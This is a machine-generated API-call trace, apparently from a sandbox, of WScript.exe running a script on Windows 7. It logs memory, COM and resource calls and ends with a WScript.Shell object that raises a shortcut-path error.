	[0087.116] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.116] GetTickCount () returned 0x26631
	[0087.119] ??2@YAPEAX_K@Z () returned 0x445b50
	[0087.121] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0087.122] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0087.123] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.123] GetTickCount () returned 0x26641
	[0087.123] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0087.123] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.123] GetTickCount () returned 0x26641
	[0087.125] ??2@YAPEAX_K@Z () returned 0x446fa0
	[0087.127] ??2@YAPEAX_K@Z () returned 0x480a20
	[0087.129] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0087.129] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.129] GetTickCount () returned 0x26641
	[0087.131] ??2@YAPEAX_K@Z () returned 0x454ba0
	[0087.133] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0087.136] ??2@YAPEAX_K@Z () returned 0x45a910
	[0087.138] ??2@YAPEAX_K@Z () returned 0x444520
	[0087.140] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0087.140] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.140] GetTickCount () returned 0x26650
	[0087.141] malloc (_Size=0x408) returned 0x462c90
	[0087.141] realloc (_Block=0x0, _Size=0xa0) returned 0x442ad0
	[0087.142] ??2@YAPEAX_K@Z () returned 0x45aa90
	[0087.144] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0087.146] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0087.146] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.146] GetTickCount () returned 0x26650
	[0087.148] ??2@YAPEAX_K@Z () returned 0x44c0c0
	[0087.225] ??2@YAPEAX_K@Z () returned 0x480a20
	[0087.227] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0087.227] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.228] GetTickCount () returned 0x266ae
	[0087.230] ??2@YAPEAX_K@Z () returned 0x44b950
	[0087.232] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0087.235] ??2@YAPEAX_K@Z () returned 0x4530d0
	[0087.237] ??2@YAPEAX_K@Z () returned 0x444520
	[0087.240] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0087.240] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.240] GetTickCount () returned 0x266bd
	[0087.242] ??2@YAPEAX_K@Z () returned 0x454900
	[0087.243] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0087.247] ??2@YAPEAX_K@Z () returned 0x44bb30
	[0087.247] GetVersionExA (in: lpVersionInformation=0x22c840*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x3012f0, dwBuildNumber=0x0, dwPlatformId=0x34e198, szCSDVersion="") | out: lpVersionInformation=0x22c840*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0087.248] FindResourceA (hModule=0x7fee13d0000, lpName=0x139, lpType=0x6) returned 0x1207f8
	[0087.248] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207f8) returned 0x121d44
	[0087.248] LockResource (hResData=0x121d44) returned 0x121d44
	[0087.249] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207f8) returned 0x15c
	[0087.249] FreeResource (hResData=0x121d44) returned 0
	[0087.249] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0087.249] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0x121c74
	[0087.249] LockResource (hResData=0x121c74) returned 0x121c74
	[0087.249] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0xce
	[0087.250] FreeResource (hResData=0x121c74) returned 0
	[0087.250] bsearch (_Key=0x22d1d8, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a5a8
	[0087.250] ??2@YAPEAX_K@Z () returned 0x480a20
	[0087.252] ??2@YAPEAX_K@Z () returned 0x44dfc0
	[0087.254] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0087.254] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.254] GetTickCount () returned 0x266cd
	[0087.432] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0087.436] ??2@YAPEAX_K@Z () returned 0x468a00
	[0087.438] ??2@YAPEAX_K@Z () returned 0x444520
	[0087.441] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0087.441] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.441] GetTickCount () returned 0x26788
	[0087.442] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0087.442] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.442] GetTickCount () returned 0x26788
	[0087.443] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0087.443] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.443] GetTickCount () returned 0x26788
	[0087.446] ??2@YAPEAX_K@Z () returned 0x4c8fa0
	[0087.447] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0087.451] ??2@YAPEAX_K@Z () returned 0x4c9c10
	[0087.453] ??2@YAPEAX_K@Z () returned 0x46d730
	[0087.453] GetTickCount () returned 0x26798
	[0087.453] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229548 | out: ppv=0x229548*=0x34f420) returned 0x0
	[0087.453] ??3@YAXPEAX@Z () returned 0x1700c80001
	[0087.453] ??3@YAXPEAX@Z () returned 0x18009e0001
	[0087.453] ??3@YAXPEAX@Z () returned 0x19009b0001
	[0087.454] ??3@YAXPEAX@Z () returned 0x1a00980001
	[0087.454] ??3@YAXPEAX@Z () returned 0x1b00950001
	[0087.454] ??3@YAXPEAX@Z () returned 0x1c00920001
	[0087.454] ??3@YAXPEAX@Z () returned 0x1d008f0001
	[0087.454] ??3@YAXPEAX@Z () returned 0x1e008c0001
	[0087.454] ??3@YAXPEAX@Z () returned 0x1f00890001
	[0087.454] ??3@YAXPEAX@Z () returned 0x2000860001
	[0087.454] ??3@YAXPEAX@Z () returned 0x2100830001
	[0087.454] ??3@YAXPEAX@Z () returned 0x2200800001
	[0087.454] ??3@YAXPEAX@Z () returned 0x23007d0001
	[0087.454] ??3@YAXPEAX@Z () returned 0x24007a0001
	[0087.454] ??3@YAXPEAX@Z () returned 0x2500770001
	[0087.454] ??3@YAXPEAX@Z () returned 0x2600740001
	[0087.454] ??3@YAXPEAX@Z () returned 0x2700710001
	[0087.454] ??3@YAXPEAX@Z () returned 0x28006e0001
	[0087.454] ??3@YAXPEAX@Z () returned 0x29006b0001
	[0087.454] ??3@YAXPEAX@Z () returned 0x2a00680001
	[0087.454] ??3@YAXPEAX@Z () returned 0x2b00650001
	[0087.454] ??3@YAXPEAX@Z () returned 0x2c00620001
	[0087.454] ??3@YAXPEAX@Z () returned 0x2d005f0001
	[0087.455] ??3@YAXPEAX@Z () returned 0x2e005c0001
	[0087.455] ??3@YAXPEAX@Z () returned 0x2f00590001
	[0087.455] ??3@YAXPEAX@Z () returned 0x3000560001
	[0087.455] ??3@YAXPEAX@Z () returned 0x3100530001
	[0087.455] ??3@YAXPEAX@Z () returned 0x3200500001
	[0087.455] ??3@YAXPEAX@Z () returned 0x33004d0001
	[0087.455] ??3@YAXPEAX@Z () returned 0x34004a0001
	[0087.455] ??3@YAXPEAX@Z () returned 0x3500470001
	[0087.455] ??3@YAXPEAX@Z () returned 0x3600440001
	[0087.455] ??3@YAXPEAX@Z () returned 0x3700410001
	[0087.455] ??3@YAXPEAX@Z () returned 0x38003e0001
	[0087.455] ??3@YAXPEAX@Z () returned 0x39003b0001
	[0087.455] ??3@YAXPEAX@Z () returned 0x3a00380001
	[0087.455] ??3@YAXPEAX@Z () returned 0x3b00350001
	[0087.455] ??3@YAXPEAX@Z () returned 0x3c00320001
	[0087.455] ??3@YAXPEAX@Z () returned 0x3d002f0001
	[0087.455] ??3@YAXPEAX@Z () returned 0x3e002c0001
	[0087.456] ??3@YAXPEAX@Z () returned 0x3f00290001
	[0087.456] ??3@YAXPEAX@Z () returned 0x4000260001
	[0087.456] ??3@YAXPEAX@Z () returned 0x4100230001
	[0087.456] ??3@YAXPEAX@Z () returned 0x4200200001
	[0087.456] ??3@YAXPEAX@Z () returned 0x43001d0001
	[0087.456] ??3@YAXPEAX@Z () returned 0x44001a0001
	[0087.456] ??3@YAXPEAX@Z () returned 0x4500170001
	[0087.456] ??3@YAXPEAX@Z () returned 0x4600140001
	[0087.456] ??3@YAXPEAX@Z () returned 0x4700110001
	[0087.456] ??3@YAXPEAX@Z () returned 0x48000e0001
	[0087.456] ??3@YAXPEAX@Z () returned 0x49000b0001
	[0087.456] ??3@YAXPEAX@Z () returned 0x4a00080001
	[0087.456] ??3@YAXPEAX@Z () returned 0x4b00050001
	[0087.456] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0087.457] free (_Block=0x499450) 
	[0087.457] free (_Block=0x469380) 
	[0087.457] free (_Block=0x4c9fe0) 
	[0087.457] free (_Block=0x498040) 
	[0087.457] free (_Block=0x484420) 
	[0087.457] free (_Block=0x45b1d0) 
	[0087.457] free (_Block=0x44ec70) 
	[0087.457] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0087.457] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0087.457] ??3@YAXPEAX@Z () returned 0x1
	[0087.457] ??3@YAXPEAX@Z () returned 0x1e00140001
	[0087.457] ??3@YAXPEAX@Z () returned 0x1f00110001
	[0087.457] ??3@YAXPEAX@Z () returned 0x20000e0001
	[0087.457] ??3@YAXPEAX@Z () returned 0x21000b0001
	[0087.457] ??3@YAXPEAX@Z () returned 0x2200080001
	[0087.457] ??3@YAXPEAX@Z () returned 0x2300050001
	[0087.457] ??3@YAXPEAX@Z () returned 0x1
	[0087.457] ??3@YAXPEAX@Z () returned 0x44007a0001
	[0087.458] ??3@YAXPEAX@Z () returned 0x4500770001
	[0087.458] ??3@YAXPEAX@Z () returned 0x4600740001
	[0087.458] ??3@YAXPEAX@Z () returned 0x4700710001
	[0087.458] ??3@YAXPEAX@Z () returned 0x48006e0001
	[0087.458] ??3@YAXPEAX@Z () returned 0x49006b0001
	[0087.458] ??3@YAXPEAX@Z () returned 0x4a00680001
	[0087.458] ??3@YAXPEAX@Z () returned 0x4b00650001
	[0087.458] ??3@YAXPEAX@Z () returned 0x4c00620001
	[0087.458] ??3@YAXPEAX@Z () returned 0x4d005f0001
	[0087.458] ??3@YAXPEAX@Z () returned 0x4e005c0001
	[0087.458] ??3@YAXPEAX@Z () returned 0x4f00590001
	[0087.458] ??3@YAXPEAX@Z () returned 0x5000560001
	[0087.458] ??3@YAXPEAX@Z () returned 0x5100530001
	[0087.458] ??3@YAXPEAX@Z () returned 0x5200500001
	[0087.458] ??3@YAXPEAX@Z () returned 0x53004d0001
	[0087.458] ??3@YAXPEAX@Z () returned 0x54004a0001
	[0087.458] ??3@YAXPEAX@Z () returned 0x5500470001
	[0087.458] ??3@YAXPEAX@Z () returned 0x5600440001
	[0087.458] ??3@YAXPEAX@Z () returned 0x5700410001
	[0087.458] ??3@YAXPEAX@Z () returned 0x58003e0001
	[0087.458] ??3@YAXPEAX@Z () returned 0x59003b0001
	[0087.458] ??3@YAXPEAX@Z () returned 0x5a00380001
	[0087.458] ??3@YAXPEAX@Z () returned 0x5b00350001
	[0087.458] ??3@YAXPEAX@Z () returned 0x5c00320001
	[0087.458] ??3@YAXPEAX@Z () returned 0x5d002f0001
	[0087.458] ??3@YAXPEAX@Z () returned 0x5e002c0001
	[0087.458] ??3@YAXPEAX@Z () returned 0x5f00290001
	[0087.458] ??3@YAXPEAX@Z () returned 0x6000260001
	[0087.458] ??3@YAXPEAX@Z () returned 0x6100230001
	[0087.458] ??3@YAXPEAX@Z () returned 0x2400020001
	[0087.458] ??3@YAXPEAX@Z () returned 0x6200200001
	[0087.458] ??3@YAXPEAX@Z () returned 0x63001d0001
	[0087.459] ??3@YAXPEAX@Z () returned 0x64001a0001
	[0087.459] ??3@YAXPEAX@Z () returned 0x6500170001
	[0087.459] ??3@YAXPEAX@Z () returned 0x25009b0001
	[0087.459] ??3@YAXPEAX@Z () returned 0x2600980001
	[0087.459] ??3@YAXPEAX@Z () returned 0x6600140001
	[0087.459] ??3@YAXPEAX@Z () returned 0x6700110001
	[0087.459] ??3@YAXPEAX@Z () returned 0x68000e0001
	[0087.459] ??3@YAXPEAX@Z () returned 0x69000b0001
	[0087.459] ??3@YAXPEAX@Z () returned 0x2700950001
	[0087.459] ??3@YAXPEAX@Z () returned 0x2800920001
	[0087.459] ??3@YAXPEAX@Z () returned 0x6a00080001
	[0087.459] ??3@YAXPEAX@Z () returned 0x1
	[0087.459] ??3@YAXPEAX@Z () returned 0x1
	[0087.459] ??3@YAXPEAX@Z () returned 0xab007a0001
	[0087.459] ??3@YAXPEAX@Z () returned 0x29008f0001
	[0087.459] ??3@YAXPEAX@Z () returned 0x2a008c0001
	[0087.459] ??3@YAXPEAX@Z () returned 0xac00770001
	[0087.459] ??3@YAXPEAX@Z () returned 0xad00740001
	[0087.460] ??3@YAXPEAX@Z () returned 0x1
	[0087.460] ??3@YAXPEAX@Z () returned 0x4d00080001
	[0087.460] ??3@YAXPEAX@Z () returned 0xae00710001
	[0087.460] ??3@YAXPEAX@Z () returned 0xaf006e0001
	[0087.460] ??3@YAXPEAX@Z () returned 0x4e00050001
	[0087.460] ??3@YAXPEAX@Z () returned 0x1
	[0087.460] ??3@YAXPEAX@Z () returned 0x2b00890001
	[0087.460] ??3@YAXPEAX@Z () returned 0x2c00860001
	[0087.460] ??3@YAXPEAX@Z () returned 0x10b007a0001
	[0087.460] ??3@YAXPEAX@Z () returned 0x10c00770001
	[0087.460] ??3@YAXPEAX@Z () returned 0xb0006b0001
	[0087.460] ??3@YAXPEAX@Z () returned 0xb100680001
	[0087.460] ??3@YAXPEAX@Z () returned 0x10d00740001
	[0087.460] ??3@YAXPEAX@Z () returned 0x10e00710001
	[0087.460] ??3@YAXPEAX@Z () returned 0x1
	[0087.460] ??3@YAXPEAX@Z () returned 0x8d00650001
	[0087.460] ??3@YAXPEAX@Z () returned 0xb200650001
	[0087.460] ??3@YAXPEAX@Z () returned 0xb300620001
	[0087.460] ??3@YAXPEAX@Z () returned 0x8e00620001
	[0087.460] ??3@YAXPEAX@Z () returned 0x8f004a0001
	[0087.463] realloc (_Block=0x442ad0, _Size=0x140) returned 0x455720
	[0087.464] ??2@YAPEAX_K@Z () returned 0x44be60
	[0087.465] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0087.465] GetTickCount () returned 0x267a7
	[0087.466] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229548 | out: ppv=0x229548*=0x34f420) returned 0x0
	[0087.604] ??2@YAPEAX_K@Z () returned 0x4660a0
	[0087.606] ??2@YAPEAX_K@Z () returned 0x444520
	[0087.606] GetTickCount () returned 0x26824
	[0087.606] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229548 | out: ppv=0x229548*=0x34f420) returned 0x0
	[0087.606] free (_Block=0x494410) 
	[0087.606] free (_Block=0x469170) 
	[0087.606] free (_Block=0x4b4fd0) 
	[0087.606] free (_Block=0x493000) 
	[0087.606] free (_Block=0x483000) 
	[0087.606] free (_Block=0x45acc0) 
	[0087.606] free (_Block=0x44e9e0) 
	[0087.606] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0087.606] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0087.610] ??2@YAPEAX_K@Z () returned 0x4662e0
	[0087.612] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0087.615] ??2@YAPEAX_K@Z () returned 0x467580
	[0087.617] ??2@YAPEAX_K@Z () returned 0x46d730
	[0087.617] GetTickCount () returned 0x26824
	[0087.617] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229548 | out: ppv=0x229548*=0x34f420) returned 0x0
	[0087.617] free (_Block=0x494410) 
	[0087.618] free (_Block=0x469170) 
	[0087.618] free (_Block=0x4b4fd0) 
	[0087.618] free (_Block=0x493000) 
	[0087.618] free (_Block=0x483000) 
	[0087.618] free (_Block=0x45acc0) 
	[0087.618] free (_Block=0x44e9e0) 
	[0087.618] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0087.618] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0087.621] malloc (_Size=0x808) returned 0x467f20
	[0087.621] ??2@YAPEAX_K@Z () returned 0x467850
	[0087.624] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0087.627] ??2@YAPEAX_K@Z () returned 0x4667c0
	[0087.629] ??2@YAPEAX_K@Z () returned 0x46d7b0
	[0087.633] ??2@YAPEAX_K@Z () returned 0x46cfc0
	[0087.635] ??2@YAPEAX_K@Z () returned 0x444520
	[0087.635] GetTickCount () returned 0x26834
	[0087.635] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229548 | out: ppv=0x229548*=0x34f420) returned 0x0
	[0087.811] ??2@YAPEAX_K@Z () returned 0x4c9100
	[0087.813] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0087.817] ??2@YAPEAX_K@Z () returned 0x4c9940
	[0087.818] ??2@YAPEAX_K@Z () returned 0x46d730
	[0087.822] ??2@YAPEAX_K@Z () returned 0x466880
	[0087.824] ??2@YAPEAX_K@Z () returned 0x46d7b0
	[0087.824] GetTickCount () returned 0x268ff
	[0087.824] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229548 | out: ppv=0x229548*=0x34f420) returned 0x0
	[0087.824] free (_Block=0x494410) 
	[0087.824] free (_Block=0x469170) 
	[0087.824] free (_Block=0x4b4fd0) 
	[0087.824] free (_Block=0x493000) 
	[0087.824] free (_Block=0x483000) 
	[0087.824] free (_Block=0x45acc0) 
	[0087.824] free (_Block=0x44e9e0) 
	[0087.824] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0087.824] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0087.828] ??2@YAPEAX_K@Z () returned 0x44bef0
	[0087.830] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0087.830] GetTickCount () returned 0x268ff
	[0087.830] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x229548 | out: ppv=0x229548*=0x34f420) returned 0x0
	[0087.833] MulDiv (nNumber=756, nNumerator=100, nDenominator=3006) returned 25
	[0087.833] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.833] GetTickCount () returned 0x268ff
	[0087.835] ??2@YAPEAX_K@Z () returned 0x4ccf10
	[0087.837] ??2@YAPEAX_K@Z () returned 0x444520
	[0088.022] ??2@YAPEAX_K@Z () returned 0x4cd5d0
	[0088.024] ??2@YAPEAX_K@Z () returned 0x46d730
	[0088.026] MulDiv (nNumber=1142, nNumerator=100, nDenominator=3532) returned 32
	[0088.026] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.026] GetTickCount () returned 0x269ba
	[0088.028] ??2@YAPEAX_K@Z () returned 0x4d1e40
	[0088.031] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0088.034] ??2@YAPEAX_K@Z () returned 0x4d2a40
	[0088.036] ??2@YAPEAX_K@Z () returned 0x46d7b0
	[0088.040] ??2@YAPEAX_K@Z () returned 0x444520
	[0088.042] ??2@YAPEAX_K@Z () returned 0x44dfc0
	[0088.047] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0088.053] ??2@YAPEAX_K@Z () returned 0x46d730
	[0088.179] MulDiv (nNumber=941, nNumerator=100, nDenominator=3335) returned 28
	[0088.179] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.179] GetTickCount () returned 0x26a56
	[0088.183] MulDiv (nNumber=985, nNumerator=100, nDenominator=3412) returned 29
	[0088.183] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.183] GetTickCount () returned 0x26a65
	[0088.187] MulDiv (nNumber=997, nNumerator=100, nDenominator=3476) returned 29
	[0088.187] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.187] GetTickCount () returned 0x26a65
	[0088.191] MulDiv (nNumber=1016, nNumerator=100, nDenominator=3496) returned 29
	[0088.191] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.191] GetTickCount () returned 0x26a65
	[0088.193] MulDiv (nNumber=1128, nNumerator=100, nDenominator=3607) returned 31
	[0088.193] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.193] GetTickCount () returned 0x26a65
	[0088.197] MulDiv (nNumber=984, nNumerator=100, nDenominator=3525) returned 28
	[0088.197] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.197] GetTickCount () returned 0x26a65
	[0088.201] MulDiv (nNumber=980, nNumerator=100, nDenominator=3576) returned 27
	[0088.201] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.201] GetTickCount () returned 0x26a75
	[0088.204] MulDiv (nNumber=979, nNumerator=100, nDenominator=3636) returned 27
	[0088.204] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.204] GetTickCount () returned 0x26a75
	[0088.269] MulDiv (nNumber=990, nNumerator=100, nDenominator=3729) returned 27
	[0088.270] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.270] GetTickCount () returned 0x26ab3
	[0088.289] MulDiv (nNumber=1186, nNumerator=100, nDenominator=3760) returned 32
	[0088.289] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.289] GetTickCount () returned 0x26ac3
	[0088.292] MulDiv (nNumber=969, nNumerator=100, nDenominator=3591) returned 27
	[0088.292] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.292] GetTickCount () returned 0x26ad3
	[0088.296] MulDiv (nNumber=1015, nNumerator=100, nDenominator=3620) returned 28
	[0088.296] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.296] GetTickCount () returned 0x26ad3
	[0088.308] MulDiv (nNumber=958, nNumerator=100, nDenominator=3645) returned 26
	[0088.308] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.308] GetTickCount () returned 0x26ae2
	[0088.366] _resetstkoflw () returned 0x1
	[0088.367] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x120718
	[0088.367] LoadResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x120b6c
	[0088.367] LockResource (hResData=0x120b6c) returned 0x120b6c
	[0088.367] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x86
	[0088.368] FreeResource (hResData=0x120b6c) returned 0
	[0088.368] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0088.368] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0x121c74
	[0088.368] LockResource (hResData=0x121c74) returned 0x121c74
	[0088.368] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0xce
	[0088.369] FreeResource (hResData=0x121c74) returned 0
	[0088.369] GetTickCount () returned 0x26b11
	[0088.369] bsearch (_Key=0x143398, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0088.369] ??2@YAPEAX_K@Z () returned 0x44e0e0
	[0088.371] GetProcAddress (hModule=0x7fefea30000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefea4a4c4
	[0088.371] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x22cfd0 | out: lpclsid=0x22cfd0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
	[0088.374] SysStringLen (param_1=0x0) returned 0x0
	[0088.374] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetClassObject") returned 0x7fefea62e18
	[0088.374] CoGetClassObject (in: rclsid=0x22cfd0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fee1476300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22cfa0 | out: ppv=0x22cfa0*=0x44cc10) returned 0x0
	[0088.379] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22b270 | out: lpSystemTimeAsFileTime=0x22b270*(dwLowDateTime=0xad049450, dwHighDateTime=0x1d543d1)) 
	[0088.379] GetCurrentProcessId () returned 0xb14
	[0088.379] GetCurrentThreadId () returned 0xb28
	[0088.379] GetTickCount () returned 0x26b11
	[0088.379] QueryPerformanceCounter (in: lpPerformanceCount=0x22b278 | out: lpPerformanceCount=0x22b278*=21280522663) returned 1
	[0088.379] malloc (_Size=0x100) returned 0x4d4ce0
	[0088.379] GetVersionExA (in: lpVersionInformation=0x22b050*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe15a2dc8, dwBuildNumber=0x7fe, dwPlatformId=0xe1590000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x22b050*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0088.380] GetUserDefaultLCID () returned 0x409
	[0088.380] ??2@YAPEAX_K@Z () returned 0x44cc10
	[0088.380] ??2@YAPEAX_K@Z () returned 0x4fbf30
	[0088.381] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22cdd0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0088.381] lstrlenA (lpString="\\wscript.exe") returned 12
	[0088.381] lstrlenA (lpString="C:\\Windows\\System32\\WScript.exe") returned 31
	[0088.381] _strcmpi (_Str1="\\WScript.exe", _Str2="\\wscript.exe") returned 0
	[0088.381] GetModuleHandleA (lpModuleName=0x0) returned 0xff6b0000
	[0088.381] GetProcAddress (hModule=0xff6b0000, lpProcName=0x1) returned 0xff6bd7f8
	[0088.381] ??3@YAXPEAX@Z () returned 0x3b003e0001
	[0088.381] GetTickCount () returned 0x26b21
	[0088.381] malloc (_Size=0x808) returned 0x4cbfe0
	[0088.385] CreateErrorInfo (in: pperrinfo=0x22c070 | out: pperrinfo=0x22c070*=0x37a718) returned 0x0
	[0088.386] CErrorObject::SetGUID () returned 0x0
	[0088.386] CErrorObject::SetSource () returned 0x0
	[0088.386] LoadStringW (in: hInstance=0x7fee1590000, uID=0x1004, lpBuffer=0x22a7b0, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0088.386] FormatMessageW (in: dwFlags=0x500, lpSource=0x37e5d8, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x22c080, nSize=0x0, Arguments=0x22c0f0 | out: lpBuffer="\xb570\x3c") returned 0x31
	[0088.386] CErrorObject::SetDescription () returned 0x0
	[0088.386] CErrorObject::SetHelpFile () returned 0x0
	[0088.386] CErrorObject::SetHelpContext () returned 0x0
	[0088.387] QueryInterface () returned 0x0
	[0088.387] SetErrorInfo (dwReserved=0x0, perrinfo=0x37a710) returned 0x0
	[0088.387] Release () returned 0x2
	[0088.387] IUnknown:Release (This=0x37a710) returned 0x1
	[0088.387] LocalFree (hMem=0x3cb570) returned 0x0
	[0088.387] IUnknown:Release (This=0x3ca2e0) returned 0x1
	[0088.389] SetItemAlloc () returned 0x0
	[0088.389] IUnknown:AddRef (This=0x44c8b0) returned 0x2
	[0088.389] Release () returned 0x1
	[0088.389] QueryInterface () returned 0x80004002
	[0088.389] QueryInterface () returned 0x80004002
	[0088.389] QueryInterface () returned 0x80004002
	[0088.389] QueryInterface () returned 0x80004002
	[0088.389] QueryInterface () returned 0x0
	[0088.389] GetTickCount () returned 0x26b21
